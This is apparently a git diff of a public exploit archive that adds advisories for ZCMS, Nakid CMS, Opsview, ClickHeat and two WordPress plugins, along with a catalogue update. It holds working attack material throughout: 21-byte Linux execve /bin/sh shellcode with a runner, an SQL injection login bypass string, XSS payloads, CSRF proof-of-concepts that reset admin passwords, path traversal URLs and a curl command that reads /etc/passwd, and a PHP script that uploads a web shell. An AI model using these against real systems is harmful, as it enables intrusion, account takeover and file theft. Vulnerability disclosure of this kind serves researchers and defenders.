diff --git a/files.csv b/files.csv index ff38429ba..be9c06f98 100755 --- a/files.csv +++ b/files.csv @@ -33612,7 +33612,8 @@ id,file,description,date,author,platform,type,port 37228,platforms/php/webapps/37228.txt,"concrete5 index.php/tools/required/files/add_to searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0 37229,platforms/php/webapps/37229.txt,"concrete5 index.php/tools/required/files/permissions searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0 37230,platforms/php/webapps/37230.txt,"concrete5 index.php/tools/required/dashboard/sitemap_data.php Multiple Parameter XSS",2012-05-20,AkaStep,php,webapps,0 -37248,platforms/php/webapps/37248.txt,"Milw0rm Clone Script v1.0 - (time based) SQLi",2015-06-09,"John Smith",php,webapps,0 +37248,platforms/php/webapps/37248.txt,"Milw0rm Clone Script 1.0 - (Time Based) SQLi",2015-06-09,Pancaker,php,webapps,0 +37251,platforms/lin_x86/shellcode/37251.asm,"Linux/x86 - execve /bin/sh shellcode (21 bytes)",2015-06-10,B3mB4m,lin_x86,shellcode,0 37237,platforms/hardware/webapps/37237.txt,"D-Link DSL-2780B DLink_1.01.14 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0 37238,platforms/hardware/webapps/37238.txt,"TP-Link ADSL2+ TD-W8950ND - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0 37239,platforms/windows/dos/37239.html,"Microsoft Internet Explorer 11 - Crash PoC",2015-06-08,"Pawel Wylecial",windows,dos,0 @@ -33621,6 +33622,7 @@ id,file,description,date,author,platform,type,port 37243,platforms/php/webapps/37243.txt,"Wordpress Wp-ImageZoom 1.1.0 - Multiple Vulnerabilities",2015-06-08,T3N38R15,php,webapps,80 37244,platforms/php/webapps/37244.txt,"Wordpress Plugin 'WP Mobile Edition' - LFI Vulnerability",2015-06-08,"Ali Khalil",php,webapps,0 37245,platforms/php/webapps/37245.txt,"Pasworld detail.php - Blind Sql Injection Vulnerability",2015-06-08,"Sebastian khan",php,webapps,0 +37266,platforms/php/webapps/37266.txt,"ClickHeat <= 1.14 Change Admin Password CSRF",2015-06-12,"David Shanahan",php,webapps,80 37249,platforms/linux/dos/37249.py,"Libmimedir VCF Memory Corruption PoC",2015-06-10,"Jeremy Brown",linux,dos,0 37250,platforms/xml/webapps/37250.txt,"HP WebInspect <= 10.4 XML External Entity Injection",2015-06-10,"Jakub Palaczynski",xml,webapps,0 37256,platforms/multiple/webapps/37256.txt,"Heroku Bug Bounty #2 - (API) Re Auth Session Bypass Vulnerability",2015-06-10,Vulnerability-Lab,multiple,webapps,0 @@ -33633,3 +33635,8 @@ id,file,description,date,author,platform,type,port 37263,platforms/php/webapps/37263.txt,"AnimaGallery 2.6 - Local File Inclusion",2015-06-10,d4rkr0id,php,webapps,80 37264,platforms/php/webapps/37264.txt,"WordPress Encrypted Contact Form Plugin 1.0.4 - CSRF Vulnerability",2015-06-10,"Nitin Venkatesh",php,webapps,80 37265,platforms/linux/local/37265.txt,"OSSEC 2.7 <= 2.8.1 - Local Root Escalation",2015-06-11,"Andrew Widdersheim",linux,local,0 +37270,platforms/php/webapps/37270.txt,"Nakid CMS - Multiple Vulnerabilities",2015-06-12,"John Page",php,webapps,80 +37271,platforms/multiple/webapps/37271.txt,"Opsview <= 4.6.2 - Multiple XSS Vulnerabilities",2015-06-12,"Dolev Farhi",multiple,webapps,80 +37272,platforms/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,"John Page",jsp,webapps,0 +37274,platforms/php/webapps/37274.txt,"WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal",2015-06-12,"Larry W. Cashdollar",php,webapps,80 +37275,platforms/php/webapps/37275.txt,"WordPress Aviary Image Editor Add On For Gravity Forms 3.0 Beta Shell Upload",2015-06-12,"Larry W. Cashdollar",php,webapps,80 diff --git a/platforms/jsp/webapps/37272.txt b/platforms/jsp/webapps/37272.txt new file mode 100755 index 000000000..04f56434a --- /dev/null +++ b/platforms/jsp/webapps/37272.txt @@ -0,0 +1,137 @@ +# Exploit Title: SQL Injection & Persistent XSS +# Google Dork: intitle: SQL Injection & Persistent XSS +# Date: 2015-06-12 +# Exploit Author: John Page ( hyp3rlinx ) +# Website: hyp3rlinx.altervista.org +# Vendor Homepage: zencherry.com +# Software Link: sourceforge.net/projects/zencherrycms +# Version: 1.1 +# Tested on: windows 7 on Apache Tomcat +# Category: webapps + + +Vendor: +============================================= +http://zencherry.com/ +http://sourceforge.net/projects/zencherrycms + + + +Product: +================================================== +ZCMS 1.1 JavaServer Pages Content Management System + + + +Advisory Information: +============================== +SQL Injection & Persistent XSS + + + +Vulnerability Details: +====================== +SQL Injection: +Login to admin area requires a password but is easily bypassed +using classic SQLInjection method because application uses +concatenated user input to construct SQL queries. + + +ZCMS exploitable admin login code: +================================== +squerry="SELECT COUNT(username) AS usercount FROM "+TABLE_PREFIX+"users +WHERE +status = 0 AND username = '"+username+"' AND password = +'"+request.getParameter("pass") +"' AND type = 1 ;"; + + +So we just supply an Admin password like ---> HELL' OR '2'='2 +which will resolve as true! + + +SQL Inject XSS Payload: +======================= +We can also inject persisten XSS payload directly to MySQL database +subverting +all character filtering leveraging existing SQLInjection vulnerabilities. + + +Persistent XSS: +=============== + +Another persistent XSS vector is here in author field for comments: +http://localhost:8081/ZCMS_1.1/ZCMS_1.1/index.jsp?dir=editpost&p=[page +number] + + +Exploit code(s): +=============== + +1) Bypass admin login +--------------------- +localhost:8081/ZCMS_1.1/ZCMS_1.1/?dir=login +Enter 'admin' for username field +Enter HELL' OR '2'='2 for the pass field + + +2) Inject XSS using SQL Injection +--------------------------------- +http://localhost:8081/ZCMS_1.1/ZCMS_1.1/?dir=editpost&p=1&title= +" +&content=&author= +SATAN&visibility=1&type=1&comm=0 + + +3) Persistent XSS field +----------------------- +http://localhost:8081/ZCMS_1.1/ZCMS_1.1/index.jsp?dir=editpost&p=[page +number] +Inject in author input field. + + + +Disclosure Timeline: +========================================================= +Vendor Notification: NA +June 12, 2015 : Public Disclosure + + + +Severity Level: +========================================================= +High + + + +Description: +========================================================== + +Request Method(s): [+] GET & POST + + +Vulnerable Product: [+] ZCMS_1.1 + + +Vulnerable Parameter(s): [+] pass, title, content, author + + +Affected Area(s): [+] Admin, CMS + + +=============================================================== + +[+] Disclaimer +Permission is hereby granted for the redistribution of this advisory, +provided that +it is not altered except by reformatting it, and that due credit is given. +Permission is +explicitly given for insertion in vulnerability databases and similar, +provided that +due credit is given to the author. The author is not responsible for any +misuse of the +information contained herein and prohibits any malicious use of all +security related +information or exploits by the author or elsewhere. + + +(hyp3rlinx) diff --git a/platforms/lin_x86/shellcode/37251.asm b/platforms/lin_x86/shellcode/37251.asm new file mode 100755 index 000000000..eaeadfac3 --- /dev/null +++ b/platforms/lin_x86/shellcode/37251.asm @@ -0,0 +1,29 @@ +Linux/x86 execve /bin/sh shellcode 21 bytes + + +#Greetz : KnocKout,curtis,Bomberman(Leader) +#Author : B3mB4m + +Disassembly of section .text: + +08048060 <.text>: + 8048060: 31 c0 xor %eax,%eax + 8048062: 50 push %eax + 8048063: 68 2f 2f 73 68 push $0x68732f2f + 8048068: 68 2f 62 69 6e push $0x6e69622f + 804806d: 89 e3 mov %esp,%ebx + 804806f: 89 c2 mov %eax,%edx + 8048071: b0 0b mov $0xb,%al + 8048073: cd 80 int $0x80 + + +#include +#include + +char *shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc2\xb0\x0b\xcd\x80"; + +int main(void){ + fprintf(stdout,"Length: %d\n",strlen(shellcode)); + (*(void(*)()) shellcode)();} + +# Length: 21 PWNED ! \ No newline at end of file diff --git a/platforms/linux/local/120.c b/platforms/linux/local/120.c index 2887000c4..06728aeb6 100755 --- a/platforms/linux/local/120.c +++ b/platforms/linux/local/120.c @@ -59,7 +59,7 @@ #define PATH "/usr/local/bin/terminatorX" #define RET 0xbffff69e -char shellcode[] "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3" +char shellcode[]= "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3" "\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; char *buffer,*ptr; @@ -234,6 +234,6 @@ main(int argc,char *argv[]) return 0; } - - -// milw0rm.com [2003-11-13] + + +// milw0rm.com [2003-11-13] diff --git a/platforms/multiple/webapps/37271.txt b/platforms/multiple/webapps/37271.txt new file mode 100755 index 000000000..54fda0f5a --- /dev/null +++ b/platforms/multiple/webapps/37271.txt @@ -0,0 +1,68 @@ +# Exploit title: Opsview 4.6.2 - Multiple XSS +# Date: 07-06-2015 +# Vendor homepage: www.opsview.com +# Version: 4.6.2 +# CVE: CVE-2015-4420 +# Author: Dolev Farhi @dolevf +# Tested On: Kali Linux + Windows 7 + +# Details: +# -------- +# Opsview is a monitoring system based on Nagios Core. Opsview is prone to several stored and reflected XSS vulnerabilities in the latest version + + + +1. Stored XSS through a malicious check plugin + +a. Create a plugin with the following content: + +#!/bin/bash +echo '' +exit 2 + +b. create a new check and assign this plugin. + +c. once a host uses this check, navigate to the event page, the XSS will be injected. + +d. once a user/admin acknowledges this critical event (exit 2), the code will be injected prior his acknowledgement. + + + +2. Stored XSS in host profile + +a. add a host + +b. in the description of the host, add a description as the one below: + + +c. save settings + +d. once a user/admin views the host settings, XSS will be injected. + + +3. Reflected XSS in Test service check page. +a. Add a new service check + +b. Test the new service check against any host and provide in the command line the following + +c. the XSS will immediately reflect to the screen. + +response output: + +POST /state/service/166/exec HTTP/1.1 +Host: 192.168.0.20 +User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.4.0 +Accept: text/plain, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Referer: http://192.168.0.20/status/service?host_state=0&host_filter=handled&host=opsview +Content-Length: 105 +Cookie: PHPSESSID= +auth_tkt= +Connection: keep-alive +Pragma: no-cache +Cache-Control: no-cache + +plugin_args=%3Cscript%3Ealert(%22opsview%22)%3C%2Fscript%3E&_CSRFToken=0x84BCDAD00D5111E5988CB34E7AFD915 \ No newline at end of file diff --git a/platforms/php/webapps/37248.txt b/platforms/php/webapps/37248.txt index 9e2ede231..8203a1725 100755 --- a/platforms/php/webapps/37248.txt +++ b/platforms/php/webapps/37248.txt @@ -103,13 +103,3 @@ ___________    ____   ____ _____  |  | __ ___________ |   __(____  /___|  /\___  >____  /__|_ \\___  >__| |__|       \/     \/     \/     \/     \/    \/ .........................cant be pr0 without ascii art - - - Den tisdag, 9 juni 2015 8:17 skrev john smith : - - - sir - y u no pub?https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4137 - - - - \ No newline at end of file diff --git a/platforms/php/webapps/37266.txt b/platforms/php/webapps/37266.txt new file mode 100755 index 000000000..09e076a22 --- /dev/null +++ b/platforms/php/webapps/37266.txt @@ -0,0 +1,51 @@ +# Exploit Title: ClickHeat <1.1.4 Change Admin Password CSRF +# Google Dork: allinurl:/clickheat/ +# Date: 11-06-2015 +# Exploit Author: David Shanahan (@CyberpunkSec) +# Contact: https://twitter.com/CyberpunkSec +# Vendor Homepage: http://www.labsmedia.com/clickheat/index.html +# Software Link: http://sourceforge.net/projects/clickheat/files/clickheat/ +# Version: 1.14 +# Tested on: Windows + +---- Description ---- + +ClickHeat is vulnerable to a CSRF attack because it does not implement a +CSRF token when updating the config file. If an authenticated admin is +tricked into opening this malicious URL, the form will be submitted which +changes the administrator password to the one the attacker has specified. + +---- CSRF PoC ---- + +Set the value of "adminLogin" to the administrators username, then set the +value of "adminPass" to a md5 hash of the password you want. (you may also +need to change the "logPath" & "cachePath") + +/* CODE */ + + + +
+ +
+ +/* CODE */ + +---- Solution ---- + +The ClickHeat project seems to be dead, as it has not been updated since +late 2011. Due to this, I truly doubt a patch will be issued so I would +recommend removing this product from your website. diff --git a/platforms/php/webapps/37270.txt b/platforms/php/webapps/37270.txt new file mode 100755 index 000000000..91c6e1148 --- /dev/null +++ b/platforms/php/webapps/37270.txt @@ -0,0 +1,284 @@ +# Exploit Title: CSRF, Persistent XSS & LFI +# Google Dork: intitle: CSRF, Persistent XSS & LFI +# Date: 2015-06-11 +# Exploit Author: John Page ( hyp3rlinx ) +# Website: hyp3rlinx.altervista.org +# Vendor Homepage: kilrizzy.github.io/Nakid-CMS +# Software Link: kilrizzy.github.io/Nakid-CMS +# Version: kilrizzy-Nakid-CMS-f274624 +# Tested on: windows 7 on XAMPP +# Category: webapps + + +Vendor: +================================ +http://kilrizzy.github.io/Nakid-CMS/ + + + +Product: +================================ +kilrizzy-Nakid-CMS-f274624 +Nakid CMS is an open source content management system built using PHP and +CodeIgniter. + + +Setup mode: +========== +Under root dir for Nakid CMS we set to production mode instead of +development in index.php. +e.g. define('ENVIRONMENT', 'production'); + + + +Advisory Information: +================================================ +CSRF, Persistent XSS & Auth bypass LFI + + + +Vulnerability Details: +===================== +Multiple CSRF(s) exist: + +We have ability to do the following as no CSRF tokens are present. + +1-Change Admin password +2-Add arbitrary users to system +3-Alter system settings + + + +XSS (persistent): +XSS parameter vulnerabilities exist for the following: +payloads will be stored in the MySQL database and activated when a victim +visits the vulnerable webpage. + + +XSS URL: +-------- +http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/users +On the "Edit Record" pop up dialog box. + + +Vulnerable parameters: +--------------------- +username +password +email +fname +lname + + +XSS URL: +-------- +http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/settings +On the "Edit Record" pop up dialog box. + + +Vulnerable parameters: +--------------------- +from_name +include_path +primary_email +from_email + + +XSS URL: +-------- +http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/content_edit/1 + +Vulnerable parameter: +-------------------- +title + + +Authentication bypass LFI: +Local file inclusion to bypass access controls and read aribitrary files +exist by setting '$url' PHP variable on following URL + +index.php/connector$url + + + +Exploit POC code(s): +==================== + +CSRF(s): +======== + +Condition: +Pursuade victim to visit our webpage or click our link, if they have a +session then we do our CSRF!. + + +1- Add arbitrary user to system +-------------------------------- + + + + + + + +
+ + + + + + + +
+ + + + +2-Change Admin password +------------------------ + + + + + + + +
+ + + + + + + +
+ + + + +3-Alter system settings +----------------------- + + + + + + + +
+ + + +
+ + + + +XSS persistent POC code: +======================= + +Inject into any of the following vulnerable +fields described above using POST method. +Need to highlight a row then click edit dialog box to edit settings. + +e.g. + +http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/settings + +from_name <------- +include_path +primary_email +from_email + + +Authorization bypass LFI: +======================== + +1- Logout, create a hell.txt file or whatever and put in 'htdocs' or web +root, then visit the URL (change to suit your environment). + +2- +http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/connector$url=../../../../../../../hell.txt + +OR try + +http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/connector$url=../../../../../../xampp/phpinfo.php + + + + +Disclosure Timeline: +========================================================= +Vendor Notification: NA +June 11, 2015 : Public Disclosure + + + + +Severity Level: +========================================================= +High + + + +Description: +========================================================== + +Request Method(s): [+] GET & POST + + +Vulnerable Product: [+] kilrizzy-Nakid-CMS-f274624 + + +Vulnerable Parameter(s): [+] + username + password + email + fname + lname + from_name + include_path + primary_email + from_email + title + connector$url + + +Affected Area(s): [+] /system/users + /system/profile + /system/content_edit/ + +=============================================================== + +[+] Disclaimer +Permission is hereby granted for the redistribution of this advisory, +provided that it is not altered except by reformatting it, and that due +credit is given. Permission is explicitly given for insertion in +vulnerability databases and similar, provided that due credit is given to +the author. The author is not responsible for any misuse of the information +contained herein and prohibits any malicious use of all security related +information or exploits by the author or elsewhere. + + +(hyp3rlinx) diff --git a/platforms/php/webapps/37274.txt b/platforms/php/webapps/37274.txt new file mode 100755 index 000000000..182fbf694 --- /dev/null +++ b/platforms/php/webapps/37274.txt @@ -0,0 +1,53 @@ +Title: Path Traversal vulnerability in Wordpress plugin se-html5-album-audio-player v1.1.0 +Author: Larry W. Cashdollar, @_larry0 +Date: 2015-06-06 +Advisory: http://www.vapid.dhs.org/advisory.php?v=124 +Download Site: https://wordpress.org/plugins/se-html5-album-audio-player/ +Vendor: https://profiles.wordpress.org/sedevelops/ +Vendor Notified: 2015-06-06 +Vendor Contact: https://profiles.wordpress.org/sedevelops/ +Description: +An HTML5 Album Audio Player. A plugin to archive, present, and play collections of mp3s (or other html5 audio formats) as albums within your post. + +Vulnerability: +The se-html5-album-audio-player v1.1.0 plugin for wordpress has a remote file download vulnerability. The download_audio.php file does not correctly check the file path, it only attempts to check if the path is in /wp-content/uploads which is easily defeated with ../. + +This vulnerability doesn’t require authentication to the Wordpress site. + +File ./se-html5-album-audio-player/download_audio.php: + +3 $file_name = $_SERVER['DOCUMENT_ROOT'] . $_GET['file']; +4 $is_in_uploads_dir = strpos($file_name, '/wp-content/uploads/'); +5 // make sure it's a file before doing anything! +6 if( is_file($file_name) && $is_in_uploads_dir !== false ) { +7 +8 // required for IE +9 if(ini_get('zlib.output_compression')) { ini_set('zlib.output_compression', 'Off'); } +10 +11 // get the file mime type using the file extension +12 switch(strtolower(substr(strrchr($file_name, '.'), 1))) { +13 case 'pdf': $mime = 'application/pdf'; break; +14 case 'zip': $mime = 'application/zip'; break; +15 case 'jpeg': +16 case 'jpg': $mime = 'image/jpg'; break; +17 default: $mime = 'application/force-download'; +18 } +19 header('Pragma: public'); // required +20 header('Expires: 0'); // no cache +21 header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); +22 header('Last-Modified: '.gmdate ('D, d M Y H:i:s', filemtime ($file_name)).' GMT'); +23 header('Cache-Control: private',false); +24 header('Content-Type: '.$mime); +25 header('Content-Disposition: attachment; filename="'.basename($file_name).'"'); +26 header('Content-Transfer-Encoding: binary'); +27 header('Content-Length: '.filesize($file_name)); // provide file size +28 header('Connection: close'); +29 readfile($file_name); // push it out +30 exit(); + +The above code does not verify if a user is logged in, and do proper sanity checking if the file is outside of the uploads directory. + +CVEID: 2015-4414 +OSVDB: +Exploit Code: + • $ curl http://server/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/37275.txt b/platforms/php/webapps/37275.txt new file mode 100755 index 000000000..e926d6fcd --- /dev/null +++ b/platforms/php/webapps/37275.txt @@ -0,0 +1,87 @@ +Title: Remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms v3.0beta Wordpress plugin +Author: Larry W. Cashdollar, @_larry0 +Date: 2015-06-07 +Download Site: https://wordpress.org/plugins/aviary-image-editor-add-on-for-gravity-forms +Vendor: Waters Edge Web Design and NetherWorks LLC +Vendor Notified: 2015-06-08 +Advisory: http://www.vapid.dhs.org/advisory.php?v=125 +Vendor Contact: plugins@wordpress.org +Description: A plugin that integrates the awesome Adobe Creative SDK (formerly Aviary) Photo / Image Editor with the Gravity Forms Plugin. +Vulnerability: +There is a remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms/includes/upload.php as an unauthenticated user can upload any file to the system. Including a .php file. The upload.php doesn't check that the user is authenticated and a simple post will allow arbitrary code to be uploaded to the server. + +In the file aviary-image-editor-add-on-for-gravity-forms/includes/upload.php the code doesn’t check for an authenticated Wordpress user: + +1 $max_file_size ){ +15 $msg = "File Size is too big."; +16 $error_flag = true; +17 } +18 $extension = strtolower(end(explode('.', $image_file['name']))); +19 $aa_options = get_option('gf_aa_options'); +20 $supported_files = $aa_options['supported_file_format']; +21 $supported_files = strtolower($supported_files); +22 if(!$error_flag && $supported_files != '' ){ +23 $supported_files = explode (',', $supported_files); +24 if(!in_array($extension, $supported_files)){ +25 $msg = "No Supported file."; +26 $error_flag = true; +27 } +28 } +29 if(!$error_flag){ +30 $wp_upload_dir = wp_upload_dir(); +31 if(!is_dir($wp_upload_dir['basedir'].'/gform_aviary')){ +32 mkdir($wp_upload_dir['basedir'].'/gform_aviary'); +33 } +34 $upload_dir = $wp_upload_dir['basedir'].'/gform_aviary/'; +35 $upload_url = $wp_upload_dir['baseurl'].'/gform_aviary/'; +36 $file_name = $upload_dir.$_POST['gf_aviary_field_id'].'_'.$image_file['name' ]; +37 if(move_uploaded_file($image_file['tmp_name'], $file_name)){ +38 $file_url = $upload_url.$_POST['gf_aviary_field_id'].'_'.$image_file['na me']; +39 } +40 } +41 $return_obj = array('status' => 'success', 'message' => $file_url); +42 echo json_encode($return_obj); +43 } +44 ?> + +CVEID: 2015-4455 +OSVDB: +Exploit Code: + 'shell.php','gf_aviary_file'=>'@'.$file_name_with_full_path); + + $ch = curl_init(); + curl_setopt($ch, CURLOPT_URL,$target_url); + curl_setopt($ch, CURLOPT_POST,1); + curl_setopt($ch, CURLOPT_POSTFIELDS, $post); + curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); + $result=curl_exec ($ch); + curl_close ($ch); + echo "
"; + echo $result; + echo "
"; +?>